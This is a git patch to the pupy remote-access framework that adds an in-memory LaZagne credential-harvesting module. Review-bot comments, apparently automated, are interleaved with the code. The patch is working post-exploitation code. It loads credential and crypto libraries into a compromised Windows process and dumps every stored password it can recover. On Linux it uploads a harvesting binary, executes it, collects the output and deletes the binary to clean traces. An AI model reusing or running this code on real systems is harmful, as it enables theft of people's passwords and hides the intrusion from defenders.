From f0e60a7606f28e347b43faf7a1492111662ff4b0 Mon Sep 17 00:00:00 2001 From: n1nj4sec Date: Wed, 24 Aug 2016 19:30:02 +0200 Subject: [PATCH] In-memory LaZagne module from AlessandroZ --- .gitmodules | 4 ++ pupy/external/impacket | 1 + pupy/modules/lazagne.py | 121 ++++++++++++++++++++++++++++------------ 3 files changed, 89 insertions(+), 37 deletions(-) create mode 160000 pupy/external/impacket diff --git a/.gitmodules b/.gitmodules index 632dc762..c498a279 100644 --- a/.gitmodules +++ b/.gitmodules @@ -10,3 +10,7 @@ path = pupy/external/LaZagne url = https://github.com/AlessandroZ/LaZagne shallow = true +[submodule "pupy/external/impacket"] + path = pupy/external/impacket + url = https://github.com/CoreSecurity/impacket + shallow = true diff --git a/pupy/external/impacket b/pupy/external/impacket new file mode 160000 index 00000000..8af9271f --- /dev/null +++ b/pupy/external/impacket @@ -0,0 +1 @@ +Subproject commit 8af9271f656b6d420466f8bcaec8b81253388340 diff --git a/pupy/modules/lazagne.py b/pupy/modules/lazagne.py index 6760054b..e6476948 100644 --- a/pupy/modules/lazagne.py +++ b/pupy/modules/lazagne.py @@ -1,4 +1,6 @@ # -*- coding: UTF8 -*- +# Author: AlessandroZ + from pupylib.PupyModule import * from pupylib.PupyCompleter import * from rpyc.utils.classic import upload @@ -6,6 +8,7 @@ from pupylib.utils.credentials import Credentials import tempfile import subprocess import os.path +from pupylib.utils.rpyc_utils import redirected_stdo __class_name__="LaZagne" 
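Review bot: The added `from pupylib.utils.rpyc_utils import redirected_stdo` is not referenced in any hunk of this patch, so as far as the visible changes show it is an unused import; either use it or drop the line. It is also appended after the stdlib imports (`tempfile`, `subprocess`, `os.path`) instead of being grouped with the other `pupylib` imports at the top of the file. The rest of the file is outside this hunk, so a use elsewhere cannot be ruled out from here.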
@@ -16,56 +19,100 @@ class LaZagne(PupyModule): """ def init_argparse(self): self.arg_parser = PupyArgumentParser(prog="lazagne", description=self.__doc__) + self.arg_parser.add_argument("-v", "--verbose", action='store_true') def run(self, args): platform=self.client.desc["platform"] - isWindows = True if "Windows" in platform: - lazagne_path = self.client.pupsrv.config.get("lazagne","win") + if "64" in self.client.desc["proc_arch"]: + self.error('Not yet implemented for a x64 bits process, migrate to a 32 bits process and try again ! \nEx: run migrate -c \'C:\\Windows\\SysWOW64\\notepad.exe\'') + return + + # load all dependency + self.client.load_dll(os.path.abspath(os.path.join(os.path.dirname(__file__),"..", "packages", "windows", "x86", "sqlite3.dll"))) + self.client.load_package("sqlite3") + self.client.load_package("_sqlite3") + self.client.load_package("xml") + self.client.load_package("_elementtree") + self.client.load_package("pyexpat") # needed for _elementtree module + self.client.load_package("win32crypt") + self.client.load_package("win32api") + self.client.load_package("win32con") + self.client.load_package("win32cred") + self.client.load_package("colorama") + self.client.load_package("impacket") + self.client.load_package("calendar") + self.client.load_package("win32security") + self.client.load_package("win32net") + self.client.load_package("lazagne") + + db = Credentials() + + moduleNames = self.client.conn.modules["lazagne.config.manageModules"].get_modules() + for module in moduleNames: + if args.verbose: + self.info("running module %s"%(str(module).split(' ',1)[0].strip('<'))) + passwords = module.run(module.options['dest'].capitalize()) + self.print_results(module.options['dest'].capitalize(), passwords, db) + elif "Linux" in platform: isWindows = False if "64" in self.client.desc["os_arch"]: lazagne_path = self.client.pupsrv.config.get("lazagne","linux_64") else: lazagne_path = self.client.pupsrv.config.get("lazagne","linux_32") - else: - 
self.error("Platform not supported") - return + + if not os.path.isfile(lazagne_path): + self.error("laZagne exe %s not found ! please edit laZagne section in pupy.conf"%lazagne_path) + self.error('Find releases on github: https://github.com/AlessandroZ/LaZagne/releases') + return + + tf = tempfile.NamedTemporaryFile() + dst = tf.name + tf.file.close() - if not os.path.isfile(lazagne_path): - self.error("laZagne exe %s not found ! please edit laZagne section in pupy.conf"%lazagne_path) - self.error('Find releases on github: https://github.com/AlessandroZ/LaZagne/releases') - return - - tf = tempfile.NamedTemporaryFile() - dst = tf.name - if isWindows: - remoteTempFolder = self.client.conn.modules['os.path'].expandvars("%TEMP%") - tfName = tf.name.split(os.sep) - tfName = tfName[len(tfName)-1] + '.exe' - dst = self.client.conn.modules['os.path'].join(remoteTempFolder, tfName) - tf.file.close() - - self.success("Uploading laZagne to: %s" % dst) - upload(self.client.conn, lazagne_path, dst) - - if not isWindows: + self.success("Uploading laZagne to: %s" % dst) + upload(self.client.conn, lazagne_path, dst) + self.success("Adding execution permission") cmd = ["chmod", "+x", dst] output = self.client.conn.modules.subprocess.check_output(cmd, stderr=subprocess.STDOUT, stdin=subprocess.PIPE) - self.success("Executing") - cmd = [dst, "all"] - output = self.client.conn.modules.subprocess.check_output(cmd, stderr=subprocess.STDOUT, stdin=subprocess.PIPE) - self.success("%s" % output) - - creds = self.parse_output(output) - db = Credentials() - db.add(creds) - self.success("Passwords stored on the database") - - self.success("Cleaning traces") - self.client.conn.modules['os'].remove(dst) + self.success("Executing") + cmd = [dst, "all"] + output = self.client.conn.modules.subprocess.check_output(cmd, stderr=subprocess.STDOUT, stdin=subprocess.PIPE) + self.success("%s" % output) + + creds = self.parse_output(output) + db = Credentials() + db.add(creds) + self.success("Passwords 
stored on the database") + + self.success("Cleaning traces") + self.client.conn.modules['os'].remove(dst) + + else: + self.error("Platform not supported") + return + + def print_results(self, module, creds, db): + if creds: + print "\n############## %s passwords ##############\n" % module + clean_creds = [] + for cred in creds: + clean_cred = {} + clean_cred['Tool'] = 'Lazagne' + for c in cred.keys(): + clean_cred[c] = cred[c].encode('utf-8') + print "%s: %s" % (c, cred[c]) + print + clean_creds.append(clean_cred) + + try: + db.add(clean_creds) + self.success("Passwords stored on the database") + except Exception, e: + print e def parse_output(self, output): creds = [] @@ -110,5 +157,5 @@ class LaZagne(PupyModule): key, value = line.split(':', 1) cred[key] = value.strip() except: - pass - return creds \ No newline at end of file + pass + return creds
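Review bot: `print_results` writes every recovered secret to the operator console in clear text (`print "%s: %s" % (c, cred[c])`) whether or not `--verbose` was given, so the values land in terminal scrollback and any session logging in addition to the credentials database. On an authorized engagement this is client data, so the echo should be opt-in, for example by passing `args.verbose` through and printing only the key names otherwise. In the same method `cred[c].encode('utf-8')` runs outside the `try`, so a value that is not a string would raise before `db.add` is reached, and the handler `except Exception, e: print e` bypasses the `self.error(...)` reporting that the rest of `run` uses. `run` also has no comment stating that the Windows branch loads packages into the client process while the Linux branch still uploads, executes and removes a binary at a temp path, which is what a reader needs in order to know which artifacts each branch leaves on the host.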